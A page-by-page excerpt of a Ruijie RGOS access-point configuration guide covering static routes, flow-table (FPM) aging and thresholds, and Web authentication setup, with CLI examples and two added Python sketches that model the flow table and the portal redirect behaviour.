    Configuration Guide Managing Routes Description Defaults By default, IPv6 routing is enabled. Command Global configuration mode Mode Usage Guide Run this command to disable IPv6 routing. If the device functions only as a bridge or a VoIP gateway, the device does not need to use the IPv6 routing function of the RGOS software. In this case, you can disable the IPv6 routing function of the RGOS software.
  • Page 573 Configuration Guide Managing Routes
    R1(config)# ip route 1.1.4.0 255.255.255.0 1.1.12.2
    R1(config)# ip route 1.1.5.0 255.255.255.0 1.1.12.2
    R1(config)# ip static route-limit 2
    % Exceeding maximum static routes limit.
     Check the static routes that really take effect in the routing table.
    Verification
    R1(config)# show ip route
    Codes: C - Connected, L - Local, S - Static
           R - RIP, O - OSPF, B - BGP, I - IS-IS
           N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2...
  • Page 574 Configuration Guide Managing Routes
    debug nsm kernel default-network: Debugs default network management.
    debug nsm events: Debugs internal events of route management.
    debug nsm packet send: Debugs sending of route management and routing protocol messages.
    debug nsm packet recv: Debugs receiving of route management and routing protocol messages.
  • Page 575: Scenario

    Configuration Guide Configuring FPM 2 Configuring FPM 2.1 Overview The flow platform (FPM) is a platform for the acceleration of packet service processing. Because IP packets have the flow attribute, the FPM provides services with the function to identify the flow attribute of IP packets before service processing, so as to improve service processing efficiency.
  • Page 576: Scenario

    Configuration Guide Configuring FPM 2.2.2 Configuring Loose TCP Status Check Scenario 2.2.2.1 Loose TCP status check should be configured on the device to prevent flow interruption during active/standby switchover of the device. Then a connection can be established and packets can be forwarded as long as one end sends an ACK packet, so that the connection is not interrupted at all during the active/standby switchover.
  • Page 577: Scenario

    Configuration Guide Configuring FPM 2.3.3 Flow Entry Aging 2.3.3.1 Working Principle The aging of a flow entry means that the device actively withdraws the flow entry when there is no data exchange in a certain period of time. If a session attack occurs, the flow table will be full, causing the failure to establish sessions. The aging of the flow table is designed to solve this problem.
  • Page 578 Configuration Guide Configuring FPM 2.3.7 Loose TCP Status Check 2.3.7.1 Working Principle A complete handshake process is required for the establishment of a legitimate TCP connection. In some cases, such as an active/standby switchover, the handshake for the current TCP connection may already have completed, but no corresponding flow information exists on the device.
  • Page 579: Scenario

    Configuration Steps: Disable transparent transmission of packets without flow establishment when the flow table is full.
    Ruijie# configure terminal
    Ruijie(config)# ip session direct-trans-disable
    Verification: Use the show run command to verify that the configuration includes ip session direct-trans-disable.
    2.4.1.6 Common Errors 2.4.2 Configuring the Flow Entry Aging Time...
  • Page 580 Configuration Guide Configuring FPM 2.4.2.3 Configuration Steps Configuring the Aging Time  Optional configuration.  By default, a flow entry ages within the default aging time. If the default aging time does not meet the requirement, you can use the ip session timeout command to change it. The longer the aging time, the longer the time-to-live (TTL) of the flow entry.
  • Page 581: Scenario

    Set the aging time of flows in udp-established status to 120 seconds.
    Ruijie# configure terminal
    Ruijie(config)# ip session timeout udp-established 120
    Verification: Check the aging time of flows in udp-established status on the device. The aging time should be 120 seconds.
  • Page 582: Configuration Steps

    Configuration Guide Configuring FPM 2.4.3 Configuring the Number of Packets Permitted in a Flow 2.4.3.1 Networking Requirements  An attacker may send a large number of packets of a certain type to wage a traffic attack, in which case other types of packets cannot be processed in time.
  • Page 583: Scenario

    Steps permitted to pass in each ICMP flow in icmp-started status to 10.
    Ruijie# configure terminal
    Ruijie(config)# ip session threshold icmp-started 10
    Verification: Check configuration information about the number of packets permitted to pass in each ICMP flow in icmp-started status. The number should be 10.
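    The following added Python model (not RGOS code) ties together the flow entry aging of section 2.3.3, the per-state aging time (ip session timeout), the per-flow packet threshold (ip session threshold) and the full-table behaviour toggled by ip session direct-trans-disable. The state names udp-established and icmp-started come from the examples above; the table capacity, the 30-second fallback aging time and the return labels are assumptions of the model.

```python
from dataclasses import dataclass


@dataclass
class Flow:
    state: str
    last_seen: float
    packets: int = 0


class FlowTable:
    """Model of the FPM flow table with per-state aging and per-flow packet thresholds
    (constructed to illustrate 'ip session timeout' and 'ip session threshold'; not RGOS code)."""

    def __init__(self, capacity, timeouts, thresholds, direct_trans=True):
        self.capacity = capacity            # maximum number of flow entries (assumed small here)
        self.timeouts = dict(timeouts)      # state -> aging time in seconds
        self.thresholds = dict(thresholds)  # state -> packets permitted while the flow is in that state
        self.direct_trans = direct_trans    # False models 'ip session direct-trans-disable'
        self.flows = {}

    def age(self, now, default_timeout=30):
        """Withdraw entries that have been idle longer than their state's aging time."""
        for key, flow in list(self.flows.items()):
            if now - flow.last_seen >= self.timeouts.get(flow.state, default_timeout):
                del self.flows[key]

    def forward(self, key, now, state="icmp-started"):
        """Decide one packet of flow `key`: 'forward', 'forward-stateless' or 'drop'."""
        self.age(now)
        flow = self.flows.get(key)
        if flow is None:
            if len(self.flows) >= self.capacity:
                # table full (e.g. under a session flood): either pass the packet without creating
                # an entry (transparent transmission) or drop it when that is disabled
                return "forward-stateless" if self.direct_trans else "drop"
            flow = self.flows[key] = Flow(state, now)
        flow.last_seen = now
        flow.packets += 1
        limit = self.thresholds.get(flow.state)
        if limit is not None and flow.packets > limit:
            return "drop"  # more packets than permitted in this state: the excess is dropped
        return "forward"

    def establish(self, key, new_state):
        """Move a flow to a new state (e.g. once the peer answers) and restart its packet count."""
        if key in self.flows:
            self.flows[key].state = new_state
            self.flows[key].packets = 0
```

    The threshold only bites while a flow sits in a "started" state, so a host that floods ICMP without ever completing the exchange is cut off at the configured count, while an answered flow carries on; aging then reclaims the entry, which is what keeps a flood from pinning the table full.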
  • Page 584: Scenario

    2.4.4.5 Configuration Example
    Scenario: The TCP status tracing function needs to be enabled on the current wireless forwarding device.
    Configuration Steps: Enable the TCP status tracing function on the device.
    Ruijie# configure terminal
    Ruijie(config)# ip session tcp-state-inspection-enable
    Verification: Use the show command to verify that...
  • Page 585: Scenario

    Configuration Steps: Enable the strict packet status tracing function on the forwarding device.
    Ruijie# configure terminal
    Ruijie(config)# ip session track-state-strictly
    Verification: Use the show run command to verify that the configuration includes ip session track-state-strictly.
    2.4.5.6 Common Errors 2.4.6 Configuring Loose TCP Status Check 2.4.6.1 Networking Requirements...
  • Page 586: Scenario

    Configuration Steps: Enable the loose TCP status check function on the device.
    Ruijie# configure terminal
    Ruijie(config)# ip session tcp-loose
    Verification: Use the show run command to verify that the configuration includes ip session tcp-loose.
    2.4.6.6 Common Errors 2.5 Monitoring 2.5.1.1 Clearing Various Information...
  • Page 587 Configuration Guide Configuring FPM 2.5.1.2 Displaying the Running Status
    show ip fpm counters: Displays the counters about the IPv4 packets.
    show ip v6fpm counters: Displays the counters about the IPv6 packets.
    show ip fpm flows: Displays IPv4 packet flow information.
    show ip fpm flows filter: Displays IPv4 packet flow information except specific IPv4 packet flows...
  • Page 588 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 Security Configuration 1. Configuring Web Authentication 2. Configuring AAA 3. Configuring RADIUS 4. Configuring 802.1X 5. Configuring ARP Check 6. Configuring Gateway-targeted ARP Spoofing Prevention 7. Configuring Global IP-MAC Binding 8. Configuring DHCP Snooping 9.
  • Page 589 14. Configuring SSH 15. Configuring Content Audit...
  • Page 590: Web Authentication

    Ruijie Authentication Versions There are three versions of Ruijie Web authentication, including Ruijie First-Generation Web Authentication, Ruijie Second-Generation Web Authentication, and Ruijie Internal Portal (iPortal) Web Authentication. The Web authentication process varies with authentication versions. For details, see Section 1.3 "Features".
  • Page 591: Scenario

    Configuration Guide Configuring Web Authentication  HTTP: RFC1945 and RFC2068  HTTPS: RFC2818  SNMP: RFC1157 and RFC 2578  RADIUS: RFC2865, RFC2866, and RFC3576  For the standards related to MAC SMS authentication, see the CMCC WLAN Device Interface Standards V3.1.0_20130901 (MAC Address-Based Authentication Extension), Zhejiang CMCCWLAN Fast Authentication Scheme –...
  • Page 592  Configure AAA and method lists on the NAS (for only Ruijie Second-Generation and iPortal Web Authentication).  Configure the IP address of the SAM server on the NAS (for only Ruijie Second-Generation and iPortal Web Authentication).  Configure the names of the Web authentication method lists on the NAS (for only Ruijie Second-Generation and iPortal Web Authentication).
  • Page 593 RADIUS server, or traffic detection or port status detection performed by the NAS. In Ruijie iPortal Web Authentication, a logout action may be triggered by the voluntary logout of a user through clicking the Logout button on the online page, a kickout...
  • Page 594  In Ruijie First-Generation Web Authentication, Accounting Stop packets are sent by the portal server. In Ruijie Second-Generation Web Authentication, Accounting Stop packets are sent by the NAS, the same as Ruijie iPortal Web Authentication. The selection of the Web authentication versions depends on the type of the portal server in use.
  • Page 595 After the user is authenticated, the portal server notifies the NAS that the client has passed authentication, and the NAS allows the client to access resources on the Internet. Figure 1-2 shows the flowchart of Ruijie First-Generation Web Authentication by using an AP as the NAS. Figure 1-2 Flowchart of Ruijie First-Generation Web Authentication...
  • Page 596: Scenario

    Configuration Guide Configuring Web Authentication First-generation client logout process: There are two scenarios of client logout. In the first, the NAS detects that a client has gone offline because the maximum online time has expired, the traffic limit has been reached, or the link has been disconnected. In the second, the portal server detects that the client has logged out by clicking the Logout button on the logout page, or that the keep-alive page has become invalid.
  • Page 597 Enabling Ruijie First-Generation Web Authentication By default, Ruijie First-Generation Web Authentication is disabled. Run the web-auth enable command in interface configuration mode to enable Ruijie First-Generation Web Authentication on the client-connected ports. After Web authentication is enabled, the unauthenticated clients connecting to a port will be redirected to the Webauth URL.
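    An added example, not from the guide and not Ruijie code: a Python sketch of the NAS behaviour described for first-generation Web authentication. Unauthenticated HTTP requests are intercepted and answered with a redirect to the Webauth URL; once the portal server reports success the client passes; the NAS then ends the session itself when the maximum online time expires, the traffic limit is reached or the link goes down. The portal URL, the query parameter names (mac, url) and the limits are assumptions; the actual redirect parameters used by Ruijie portal servers are not on this page.

```python
from dataclasses import dataclass
from urllib.parse import urlencode


@dataclass
class Session:
    authenticated: bool = False
    login_time: float = 0.0
    bytes_used: int = 0


class WebAuthNas:
    """Model of the NAS side of Web authentication: HTTP interception and redirection for
    unauthenticated clients, plus NAS-detected logout (constructed illustration, not RGOS code)."""

    def __init__(self, webauth_url, max_online_secs, traffic_limit_bytes):
        self.webauth_url = webauth_url      # the portal server's Webauth URL (assumed value in tests)
        self.max_online = max_online_secs
        self.traffic_limit = traffic_limit_bytes
        self.sessions = {}                  # client MAC -> Session

    def handle_http(self, mac, requested_url, now):
        """Return ('pass', url) for an authenticated client, else ('redirect', portal url)."""
        session = self.sessions.setdefault(mac, Session())
        if session.authenticated and not self.check_logout(mac, now):
            return ("pass", requested_url)
        # HTTP interception: the request is answered with a redirect to the portal, carrying the
        # client identity and the original URL so the browser can be sent back after login.
        # The parameter names 'mac' and 'url' are assumed; the real portal parameters are not on this page.
        query = urlencode({"mac": mac, "url": requested_url})
        return ("redirect", f"{self.webauth_url}?{query}")

    def portal_notify_success(self, mac, now):
        """The portal server notifies the NAS that the client passed authentication."""
        self.sessions[mac] = Session(authenticated=True, login_time=now)

    def account(self, mac, nbytes):
        """Traffic accounting for an online client."""
        if mac in self.sessions:
            self.sessions[mac].bytes_used += nbytes

    def link_down(self, mac):
        """Link disconnection detected by the NAS: the client is logged out."""
        self.sessions[mac] = Session()

    def check_logout(self, mac, now):
        """NAS-detected logout: maximum online time expired or traffic limit reached."""
        session = self.sessions.get(mac)
        if session is None or not session.authenticated:
            return False
        if now - session.login_time >= self.max_online or session.bytes_used >= self.traffic_limit:
            self.sessions[mac] = Session()  # back to unauthenticated: the next request is intercepted again
            return True
        return False
```

    The point worth noticing is that the only state the NAS trusts is what the portal server told it; the client's own claim is never consulted, and every NAS-side logout condition simply drops the client back into the intercepted state, where the next HTTP request is redirected exactly like a first visit.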
  • Page 598 The SNMP Trap/Inform function is configured to enable the NAS to inform the portal server of user logout. 1.3.2 Ruijie Second-Generation Web Authentication HTTP Interception Same as the HTTP interception technology of Ruijie First-Generation Web Authentication. HTTP Redirection Same as the HTTP redirection technology of Ruijie First-Generation Web Authentication.
  • Page 599: Scenario

    The NAS initiates authentication to the RADIUS server and returns the authentication result to the portal server. The portal server displays the authentication result (success or failure) to the user on a page. Figure 1-3 Flowchart of Ruijie Second-Generation Web Authentication Second-generation client logout process: There are two scenarios of client logout.
  • Page 600 The communication key is used to encrypt URL parameters to avoid information disclosure.  Enabling Ruijie Second-Generation Web Authentication By default, Ruijie Second-Generation Web Authentication is disabled. Run the web-auth enable {eportalv2 | template-name v2} command in interface configuration mode to enable Ruijie Second-Generation Web Authentication on the client-connected ports.
  • Page 601 Configuring an AAA Method List for Ruijie Second-Generation Web Authentication By default, no AAA method list is configured for Ruijie Second-Generation Web Authentication. Run the aaa authentication web-auth command in global configuration mode to configure an AAA method list for Ruijie Second-Generation Web Authentication.
  • Page 602 NAS: Is an access-layer device in a network. It is directly connected to clients in wired or wireless networks and must be enabled with Ruijie iPortal Web Authentication. The NAS resolves the account information that clients enter on a Webpage and sends authentication requests to the RADIUS server. It determines whether clients can access the Internet according to authentication results and pushes the authentication results to the browsers.
  • Page 603 Enabling Ruijie iPortal Web Authentication By default, Ruijie iPortal Web Authentication is disabled. Run the web-auth enable iportal command in interface configuration mode to enable Ruijie iPortal Web Authentication on the client-connected ports. After Web authentication is enabled, the unauthenticated clients connecting to a port will be redirected to the Webauth URL.
  • Page 604 Configuring an AAA Method List for Ruijie iPortal Web Authentication By default, no AAA method list is configured for Ruijie iPortal Web Authentication. Run the aaa authentication iportal command in global configuration mode to configure an AAA method list for Ruijie iPortal Web Authentication.
  • Page 605 The following figure shows the process where an STA not bound with a MAC address associates with the SSID enabled with MAC address-based SMS authentication to access the Internet. Compared with Ruijie Second-Generation Web Authentication, MAC address-based SMS authentication adds the procedures of querying MAC address binding and notifying the bound portal server of user login/logout.
  • Page 606 Configuration Guide Configuring Web Authentication  SMS Authentication Process for Bound STAs...
  • Page 607 After an STA is bound with a MAC address, the user does not need to open the browser to perform authentication for Internet access. Network access is automatically completed after the STA is associated with a network, which greatly facilitates wireless network access.
  • Page 608 AC and can be viewed on the AC. 1.3.6 WiFiDog Web Authentication HTTP Interception Same as the HTTP interception technology of Ruijie First-Generation Web Authentication. HTTP Redirection Same as the HTTP redirection technology of Ruijie First-Generation Web Authentication.
  • Page 609 Authentication server: Provides the authentication service. The authentication server negotiates with the portal server to determine the protocol (for example, RADIUS) used by authentication. Main process of WiFiDog Web authentication: Before authentication, the NAS intercepts all HTTP requests from a client and redirects these requests to the iPortal server.
  • Page 610: Scenario Figure 1-5 Flowchart of WiFiDog Web Authentication Client logout process: There are two scenarios of client logout. In one scenario, the NAS detects that a client goes offline because the maximum online time has expired, the upper traffic limit has been reached, or the link is disconnected. In the other scenario, the portal server detects that a client logs out by clicking the Logout button on the logout page.
  • Page 611 After WiFiDog Web authentication is enabled, the unauthenticated clients connecting to a port will be redirected to the Webauth URL. 1.3.7 WeChat Web Authentication HTTP Interception Same as the HTTP interception technology of Ruijie First-Generation Web Authentication. HTTP Redirection...
  • Page 612 Same as the HTTP redirection technology of Ruijie First-Generation Web Authentication. Working Principle The networking topology of WeChat Web authentication is the same as shown in Figure 1-1. Roles involved in WeChat Web authentication: User: Is the person who sets up a Wi-Fi connection through WeChat to access the Internet.
  • Page 613 WeChat client. The WeChat client determines that Internet access authorization is successful based on this parameter. A page indicating that a Wi-Fi connection is set up successfully is displayed on the WeChat client. Figure 1-6 QR Code Scan Process in WeChat-Based Wi-Fi Connection Authentication Process of the Internet access of multiple mobile devices by scanning dynamic QR codes on a PC: A user starts a PC to set up a Wi-Fi connection and chooses to connect to an SSID (steps 1 and 2).
  • Page 614 Figure 1-7 Process Where Multiple Mobile Devices Access the Internet by Scanning Dynamic QR Codes on a PC The NAS detects logout when a user's time is out, the data quota is reached, or the link is disconnected. The NAS gets a client offline with traffic lower than the threshold based on the parameters of user online traffic detection.
  • Page 615  Configuring the WeChat Webauth URL By default, no WeChat Webauth URL is configured. Run the service-url {url-string } command in template configuration mode to configure the WeChat Webauth URL. The URL address is used for the communication between the NAS and portal server. ...
  • Page 616 STA to pass. The aging time of the entry is specified by the seconds parameter. 1.4 Configuration Configuration Description and Command (Mandatory) It is used to set the basic parameters of Ruijie First-Generation Web Authentication. web-auth template eportalv1: Configures the first-generation Webauth template.
  • Page 617 web-auth enable: Enables Ruijie First-Generation Web Authentication on an interface. (Mandatory) It is used to set the basic parameters of Ruijie Second-Generation Web Authentication. aaa new-model: Enables AAA. radius-server host { ip-address } [ auth-port port-number ] [ acct-port port-number ] key: Configures the RADIUS-server host and communication key.
  • Page 618 Configuration Description and Command aaa accounting network { default | list-name } start-stop method1 [ method2... ]: Configures an AAA method list for Ruijie iPortal Accounting. (RADIUS accounting is implemented.) web-auth template iportal: Configures the iPortal Web-auth template.
  • Page 619 Mode bindmode {ip-mac-mode | ip-only-mode}: Specifies the template binding mode. (Optional) It is used to configure the page suite used by Ruijie iPortal Web Authentication for a template. Customizing a Page Suite: page-suite file-name: Customizes a page suite for Ruijie iPortal Web Authentication.
  • Page 620 Configuration Description and Command popup popup-mode [login-popup | online-popup]: Configures the way an advertisement pops up. (Optional) It is used to specify the iPortal Webauth advertisement mode in template configuration mode. Specifying the Advertisement Mode: popup-mode [login-popup Specifies iPortal...
  • Page 621 Disables link detection. (Optional) It is used to disable portal extension in order to interwork with a CMCC standard portal server. Portal extension must be enabled for interworking with Ruijie portal server software. Disabling Portal Extension: no web-auth portal extension: Disables portal extension.
  • Page 622 HTTP Retransmission Times: iportal retransmit count: retransmission times. (Optional) It is used to configure the service type used by Ruijie iPortal Web Authentication. Configuring Service Selection in Ruijie iPortal Web Authentication: iportal service [ internet internet-name ] [ local local-name ]: Configures the service type used by Ruijie iPortal Web Authentication.
  • Page 623 (Optional) It is used to configure uniqueness check of portal authentication accounts. Configuring Uniqueness Check of Portal Authentication Accounts: web-auth portal-valid unique-name: Configures uniqueness check of portal authentication accounts. 1.4.1 Configuring Ruijie First-Generation Web Authentication Configuration Effect Redirect unauthenticated clients to the Webauth URL to perform authentication. Notes Configuration Steps ...
  • Page 624 Enabling Ruijie First-Generation Web Authentication on an Interface  Mandatory.  When Ruijie First-Generation Web Authentication is enabled in interface configuration mode, Web authentication is not enabled on any port by default. The users connecting to the port do not need to perform Web authentication. Verification ...
  • Page 625 Usage Guide: The URL starts with http:// or https://.  Configuring the Format of the Webauth URL. Command: fmt { ace | ruijie }. Parameter Description: Indicates the format of the Webauth URL. Command Mode: Webauth template configuration mode. Usage Guide: ACE association is supported when fmt is set to ace.
  • Page 626 Command Mode: Global configuration mode. Usage Guide.  Configuring the SNMP-Server Community String. Command: snmp-server community {community-string} rw. Parameter Description: community-string: Indicates the community string. rw: Must be set to rw to support the read and write operations, as the Set operation on the MIB is required. Command Mode: Global configuration mode...
  • Page 627: Scenario Configuring Ruijie First-Generation Web Authentication Scenario Figure 1-8  Configuration Steps On the NAS, configure the IP address of the ePortal server and the key (ruijie) used for communicating with the ePortal server.  Configure the Webauth URL on the NAS.
  • Page 628 Ruijie(config)# snmp-server community public rw Ruijie(config)# snmp-server enable traps web-auth Ruijie(config)# snmp-server host 192.168.197.79 inform version 2c public web-auth Ruijie(config)# exit Ruijie(config)# interface range GigabitEthernet 0/2-3 Ruijie(config-if-range)# web-auth enable Ruijie(config-if-range)# exit  Verification Check whether Web authentication is configured successfully.
  • Page 629  Ruijie Second-Generation Web Authentication complies with the CMCC WLAN Service Portal Specification. Furthermore, it is extended to support Ruijie portal server. Perform compatible configuration based on the server performance in actual deployment. For details, see the subsequent chapter. ...
  • Page 630 Configuring Web Authentication  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must enable AAA.  The NAS is responsible for initiating authentication to the portal server through AAA in Ruijie Second-Generation Web Authentication.  Configuring the RADIUS-Server Host and Communication Key ...
  • Page 631 Enabling Ruijie Second-Generation Web Authentication on an Interface  Mandatory.  When Ruijie Second-Generation Web Authentication is enabled in interface configuration mode, Web authentication is not enabled on any port by default. The users connecting to the port do not need to perform Web authentication. Verification ...
  • Page 632 The URL starts with http:// or https://.  Configuring the Format of the Webauth URL. Command: fmt {cmcc-ext1 | cmcc-ext2 | cmcc-mtx | cmcc-normal | ct-jc | cucc | ruijie | custom}. Parameter Description: Indicates the format of the Webauth URL...
  • Page 633 Parameter Description: ... portal server. The key contains up to 255 characters. Command Mode: Global configuration mode. Usage Guide.  Enabling Ruijie Second-Generation Web Authentication on an Interface. Command: web-auth enable {eportalv2 | template-name}. Parameter Description: Indicates a Webauth template. Command Mode: Interface configuration mode...
  • Page 634: Scenario Configure the default AAA method lists for Web authentication and accounting on the NAS.  Configure the IP address of the portal server and the Webauth communication key (ruijie) used for communicating with the portal server on the NAS. ...
  • Page 635 Check whether Web authentication is configured successfully. Ruijie(config)#show running-config … aaa new-model aaa authentication web-auth default group radius aaa accounting network default start-stop group radius … radius-server host 192.168.197.79 key ruijie … web-auth template eportalv2 ip 192.168.197.79 url http://192.168.197.79:8080/eportal/index.jsp web-auth portal key ruijie …...
  • Page 636  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must enable AAA.  The iPortal NAS is responsible for initiating authentication to the portal server through AAA in Ruijie iPortal Web authentication.  Configuring the RADIUS-Server Host and Communication Key ...
  • Page 637  Configuring an AAA Method List for Ruijie iPortal Web Authentication  (Mandatory) To enable Ruijie iPortal Web Authentication, you must configure an AAA method list for Ruijie iPortal Web Authentication.  An AAA authentication method list associates Web authentication requests with the RADIUS server. The NAS selects an authentication method and server based on the method list.
  • Page 638 By default, the authentication port number is 1812, and the accounting port number is 1813. Usage Guide.  Configuring an AAA Method List for Ruijie iPortal Web Authentication. Command: aaa authentication iportal { default | list-name } method1 [ method2... ]. list-name: Creates a method list.
  • Page 639 Parameter Description: Indicates the advertisement interval. Command Mode: Webauth template configuration mode. Usage Guide.  Enabling Ruijie iPortal Web Authentication on an Interface. Command: web-auth enable iportal. Parameter Description: Indicates the customized template name. Command Mode: Interface configuration mode or global configuration mode...
  • Page 640 Ruijie(config)# interface range GigabitEthernet 0/2-3 Ruijie(config-if-range)# web-auth enable iportal Ruijie(config-if-range)# exit  Verification Check whether Ruijie iPortal Web Authentication is configured successfully. Ruijie(config)#show running-config … aaa new-model aaa authentication web-auth default group radius aaa accounting network default start-stop group radius …...
  • Page 641 Ruijie#show web-auth control Port Control Server Name Online User Count ------------------------- -------- --------------------- ----------------- … GigabitEthernet 0/2 iportal GigabitEthernet 0/3 iportal … Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: iportal Page-suit: default BindMode: ip-mac-mode...
  • Page 642 Enabling Ruijie iPortal Web Authentication on an Interface  Mandatory.  When Ruijie iPortal Web Authentication is enabled in interface configuration mode, Web authentication is not enabled on any port by default. The users connecting to the port do not need to perform Web authentication. Verification ...
  • Page 643: Scenario Command: url { url-string }. Parameter Description: Indicates the Webauth URL of the portal server. Command Mode: Webauth template configuration mode. Usage Guide: The URL starts with http://.  Configuring the IP Address of the NAS. Command: nas-ip { ip-address }. Parameter...
  • Page 644 Ruijie# config Enter configuration commands, one per line. End with CNTL/Z. Ruijie(config)#web-auth template wifidog Ruijie(config.tmplt.wifidog)#ip 192.168.197.79 Ruijie(config.tmplt.wifidog)#url http://192.168.197.79/auth/wifidogAuth Ruijie(config.tmplt.wifidog)#nas-ip 192.168.197.95 Ruijie(config.tmplt.wifidog)#exit Ruijie(config)# wlansec 10 Ruijie(config-wlansec)#web-auth portal wifidog Ruijie(config-if-range)# webauth Ruijie(config-if-range)# exit  Verification Check whether WiFiDog Web authentication is configured successfully.
  • Page 645 Configuration Steps  Enabling AAA  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must enable AAA.  The NAS is responsible for initiating authentication to the portal server through AAA in Ruijie Second-Generation Web Authentication. Command aaa new-model Parameter Description...
  • Page 646 Indicates method 2. Command Mode: Global configuration mode. Usage Guide: Ruijie Second-Generation Web Authentication adopts the RADIUS accounting method.  Configuring the Second-Generation Webauth Template  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must configure and apply the portal server.
  • Page 647  Configuring the Webauth Communication Key  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must configure the key used for the communication between the NAS or convergence device and portal server.  When the NAS finds an unauthenticated client attempting to access network resources, it redirects the client to the...
  • Page 648 process, the communication key is used to encrypt some data exchanged between the NAS and portal server to improve security. Command: web-auth portal key { key-string }. Parameter Description: key-string: Indicates the Webauth communication key used for the communication between the NAS and portal server.
  • Page 649: Scenario Configure the default AAA method lists for Web authentication and accounting on the NAS.  Configure the IP address of the portal server and the Webauth communication key (ruijie) used for communicating with the portal server on the NAS. ...
  • Page 650 Ruijie(config)#aaa authentication web-auth default group radius Ruijie(config)#aaa accounting network default start-stop group radius Ruijie(config)#web-auth template eportalv2 Ruijie(config.tmplt.eportalv2)#ip 192.168.197.79 Ruijie(config.tmplt.eportalv2)#exit Ruijie(config)#web-auth portal key ruijie Ruijie(config)# web-auth template eportalv2 Ruijie(config.tmplt.eportalv2)#url http://192.168.197.79:8080/eportal/index.jsp Ruijie(config.tmplt.eportalv2)#fmt cmcc-ext1 Ruijie(config.tmplt.eportalv2)#exit Ruijie(config)# web-auth sms-flow interval 5 threshold 10...
  • Page 651 … wlansec 1 web-auth bind-portal eportalv2 interface GigabitEthernet 0/3 web-auth enable eportalv2 Common Errors  The communication key between the portal server and NAS is configured incorrectly or only on the portal server or NAS, causing authentication errors.
  • Page 652 Configuring the WeChat Webauth Version  (Optional) By default, V1.0 is used. Command: version {1.0 | 16wifi}. Parameter Description: version: Indicates the version of WeChat Web authentication. By default, Ruijie V1.0 is used. Command Mode: Webauth template configuration mode. Usage Guide...
  • Page 653 port 4990.  Configuring PC Authentication Exemption  (Optional) Authentication exemption allows the STAs that are identified as PC or Other to access the Internet without performing WeChat-based Wi-Fi connection authentication. Command: free-auth pc. Parameter Description. Command Mode: Webauth template configuration mode...
  • Page 654  To cancel collective escape, run the web-auth wechat-escape recover command in global configuration mode to restore the single escape state. Command: web-auth wechat-escape interval minutes times count. Parameter Description: minutes: Indicates the timer interval for judging collective escape. The unit is minutes and the default value is 60 minutes.
  • Page 655: Scenario  Configure the IP address and Webauth URL on the NAS.  Configure the communication key (ruijie) used for communicating with the portal server on the NAS.  Configure the IP address used for external communication on the NAS. ...
  • Page 656 Ruijie(config.tmplt.wechat)#nas-ip 192.168.197.104 Ruijie(config.tmplt.wechat)#version 1.0 Ruijie(config.tmplt.wechat)#exit Ruijie(config)# wlansec 1 Ruijie(config-wlansec)# web-auth portal wechat Ruijie(config-wlansec)# webauth Verification Check whether Web authentication is configured successfully. Ruijie(config)#show running-config … ip name-server 192.168.58.110 … web-auth template wechat ip 192.168.197.79 service-url wmc.ruijie.com.cn key ruijie nas-ip 192.168.197.104...
  • Page 657  The ip dhcp snooping, ip dhcp snooping trust, and web-auth sta-perception enable commands are not executed when smart authentication is enabled, causing a failure of the smart authentication during second-time authentication. 1.4.7 Specifying an Authentication Method List Configuration Effect ...
  • Page 658  Specifying an Authentication Method List  Configuration Specify the authentication method list mlist1. Steps Ruijie(config.tmplt.iportal)#authentication mlist1  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: eportalv2 Url: http://17.17.1.21:8080/eportal/index.jsp 17.17.1.21 BindMode: ip-only-mode Type:...
  • Page 659 Ensure that the configured accounting method list name is consistent with that on the AAA module. Configuration Example  Specifying an Accounting Method List  Configuration Specify the accounting method list mlist1. Steps Ruijie(config.tmplt.eportalv2)#accounting mlist1  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: eportalv2 Url: http://17.17.1.21:8080/eportal/index.jsp 17.17.1.21...
  • Page 660 When the listening port of the portal server is changed, the communication port of the portal server must be modified on the NAS to enable the NAS to interact with the portal server.  In Ruijie iPortal Web Authentication, this function is used to configure the HTTP listening port of the NAS. The default port number is 8081. Notes ...
  • Page 661: Scenario Configuring the Communication Port of the Portal Server  Configuration Steps Configure the communication port of the portal server as port 10000. Ruijie(config.tmplt.eportalv2)#port 10000  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: eportalv2 Url: http://17.17.1.21:8080/eportal/index.jsp 17.17.1.21 BindMode: ip-only-mode...
  • Page 662: Scenario {ip-mac-mode | ip-only-mode}. Parameter Description: ip-mac-mode: Indicates IP-MAC binding mode. ip-only-mode: Indicates IP-only binding mode. Command Mode: Webauth template configuration mode. Usage Guide. Configuration Example  Specifying the Webauth Binding Mode  Configuration Steps Set the binding mode to IP-only. Ruijie(config.tmplt.eportalv2)#bindmode ip-only-mode...
  • Page 663 For details, see section 1.4.37 "Customizing a Page Suite." Configuration Steps  (Optional) By default, the default page suite is used. Verification  Configure Ruijie iPortal Web Authentication.  Download a page suite.  Specify the page suite.  Check whether the page suite is applied to the login page.
  • Page 664 Authmlist:default 1.4.12 Configuring an Advertisement URL Configuration Effect  Push advertisements or notices to users during Ruijie iPortal Web Authentication. Notes  To support the push feature, browsers must support the tab page mechanism. Mainstream browsers support this mechanism, whereas some browsers with built-in applications may not support it.
  • Page 665 (Optional) By default, no advertisement URL is configured, indicating that advertisements are not pushed. If an advertisement URL is configured, advertisements are displayed to users after authentication by default. Verification  Configure Ruijie iPortal Web Authentication.  Configure the advertisement URL. ...
  • Page 666 Configuration Steps  Optional.  The default is post-login mode. Verification  Configure Ruijie iPortal Web Authentication.  Configure the advertisement URL.  Check whether the browser displays the specified advertisement URL after authentication. Related Commands  Specifying the Advertisement Mode...
  • Page 667 Select an advertisement mode based on actual requirements. By default, the post-login mode is used. Configuration Example  Specifying the Advertisement Mode  Configuration Steps Configure the advertisement mode as pre-login. Ruijie(config.tmplt.iportal)#popup http://www.ruijie.com.cn/ Ruijie(config.tmplt.iportal)#popup mode login-popup  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: iportal...
